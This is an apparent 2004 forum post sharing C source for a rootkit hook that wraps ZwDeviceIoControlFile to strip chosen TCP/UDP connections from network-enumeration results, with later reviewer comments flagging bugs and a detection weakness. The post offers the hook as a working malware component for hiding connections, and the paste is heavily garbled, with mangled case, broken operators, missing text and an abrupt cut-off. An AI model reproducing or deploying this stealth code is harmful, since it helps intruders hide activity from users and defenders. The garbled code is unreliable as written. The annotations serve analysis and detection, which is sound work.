PortConnection Hiding


/*
 * Reviewer notes. This is a collapsed, case-mangled paste of a 2004 forum post;
 * the hook body is cut off at the end of the excerpt, so only what is visible
 * is annotated, and garbled tokens are marked inline rather than silently
 * "repaired".
 *
 * - NewZwDeviceIoControlFile wraps an original ZwDeviceIoControlFile
 *   (OldZwDeviceIoControlFile): every request is passed through unmodified and
 *   only the OUTPUT of a successful call with IoControlCode 0x120003, issued on
 *   a handle whose object name matches the TCP device, is post-filtered.  The
 *   CRT calls (wcstombs, stricmp) suggest a user-mode hook of ntdll rather than
 *   a kernel SSDT hook -- confirm against the original post.
 * - ZwQueryObject's return status is never checked; if the query fails,
 *   ObjectName->Name.Buffer is uninitialized when it is handed to wcstombs.
 * - wcstombs(dst, src, sizeof dst) does not NUL-terminate dst when the
 *   converted name fills all 261 bytes, so the following stricmp can read past
 *   ObjectNameMBS.
 * - The row count is derived from IoStatusBlock->Information alone;
 *   OutputBufferLength is never compared against it before OutputBuffer is
 *   walked and compacted.
 * - Detection note: entries are hidden only for queries that pass through this
 *   hooked entry point and match this one device name; an unhooked path (for
 *   example a kernel-side enumeration, or a clean copy of ntdll) still sees the
 *   connections.
 */
/* Port / Connection Hiding @ :: Worthy :: Jun 18 2004, 15:57 (UTC 0) AKcom Writes: After Rooting Holyfather's Article on Rootkits, I Wrote a hook to hide connections. I've noticed a few people Saying That That already available ones are buggy, so heres my hook (in C , minor modifications would make it c compatible) */ /* GENERIC_RECORD: one row of the table returned by the query; which field holds what depends on whether the request was for TCP or UDP (see the per-field comments) */ typedef struct _GENERIC_RECORD {ULONG entry1; /* state on tcp, local addr on udp */ ULONG entry2; /* local addr on tcp, local port on udp */ ULONG entry3; /* local port on tcp */ ULONG entry4; /* remote addr on tcp */ ULONG entry5; /* remote port on tcp */} GENERIC_RECORD, * PGENERIC_RECORD; /* NOTE(review): reads as "NTSTATUS NTAPI NewZwDeviceIoControlFile" -- spaces lost in the paste. Signature mirrors ZwDeviceIoControlFile so it can be installed in its place. */ NTSTATUSNTAPINewZwDeviceIoControlFile (IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength) {/* forward the call untouched; only its result is filtered */ NTSTATUS ntRes = ((ZWDICF) OldZwDeviceIoControlFile) (FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength); /* NOTE(review): "ntRes!" is garbled; in context this is "!NT_SUCCESS(ntRes)" -- failed calls are returned as-is */ if (NT_SUCCESS (ntRes!)) {Return ntRes;} /* only the TCP query IOCTL is filtered (0x120003 -- presumably IOCTL_TCP_QUERY_INFORMATION_EX; confirm). "! =" is "!=" garbled */ if (IoControlCode ! = 0x120003) {RETURN NTRES;} /* resolve the device name behind FileHandle into a 512-byte stack buffer; NOTE(review): the query's status is not checked on the next line */ POBJECT_NAME_INFORMATION ObjectName; Char ObjectNameBuf [512]; Ulong ReturnLen; ObjectName = (POBJECT_NAME_INFORMATION) ObjectNameBuf; ObjectName->

Name.MaximumLength = 500; ZwQueryObject (FileHandle, ObjectNameInfo, ObjectName, sizeof (ObjectNameBuf), & ReturnLen); /* NOTE(review): ZwQueryObject's status is ignored; on failure Name.Buffer below is uninitialized */ char ObjectNameMBS [261]; wcstombs (ObjectNameMBS, ObjectName-> Name.Buffer, sizeof (ObjectNameMBS)); /* NOTE(review): wcstombs does not NUL-terminate when it fills all 261 bytes, so stricmp may read past the buffer */ if (stricmp (ObjectNameMBS , "// device // TCP")! = 0) {RETURN NTRES;} /* NOTE(review): the device-name literal and "! =" are garbled by the paste (an NT device path is spelled with backslashes); requests on any other device object are passed through unfiltered */ PBYTE INPUT = (Pbyte) InputBuffer; IF (InputBufferLength <17) {Return NTRES;} /* the request header is read only after the 17-byte minimum is confirmed: byte 0 == 0x00 selects TCP (otherwise UDP), byte 16 == 0x02 selects the "extended" row layout */ Bool TCP = False; /* if ITS TCP, THEN THE FIRST ITEM IGNORE */ ULONG RECORDSIZE = 0; if (INPUT [0] == 0x00) {TCP = true; RecordSize = SizeOf (MIB_TCPROW); /* TCP */ IF (Input [16] = = 0x02) {/* Extended */ RecordSize = 4;}} else {/* udp */ recordsize = sizeof (mib_udprow); /* extended */ if (input [16] == 0x02) {recordsize = 4;}} /* NOTE(review): "= =" and "RecordSize = 4" are garbled; in context they read as "==" and "+= 4" (presumably an extra 4-byte field per extended row) -- confirm against the original, since a record size of literally 4 makes the division below wrong */ ulong entrycount = Iostatusblock-> information / recordsize; /* NOTE(review): the row count comes from Information alone and is never bounded by OutputBufferLength */ bool done; pgeneric_record data = (pgeneric_record) OutputBuffer; ulong i; ulong ip; usort port; i = 0; /* NOTE(review): text is missing between "while (i" and "Entry2" -- the loop condition and (presumably) the ip assignment were lost in the paste; "usort" reads as "USHORT" */ while (i Entry2: data-> entry1; port = (usHort) (TCP? Data-> Entry3: data-> entry2); /* I use a linked list of records to hide; just replace this with your comparison */ if (matchesConMask (ip, port, g_ConList)) {/* local endpoint matched: drop this row in place, shrink the reported length and the remaining count */ hideEndPoint ((PGENERIC_RECORD) OutputBuffer, entryCount, i, recordSize); IoStatusBlock-> Information - = recordSize; entryCount--;} Else /* I use a linked list of records to hide; just replace this with your comparison. NOTE(review): "commit i" is garbled, presumably "comparison if"; the remote-endpoint branch and the rest of the function are cut off in this excerpt */ i (tcp && matchesconmask (data->

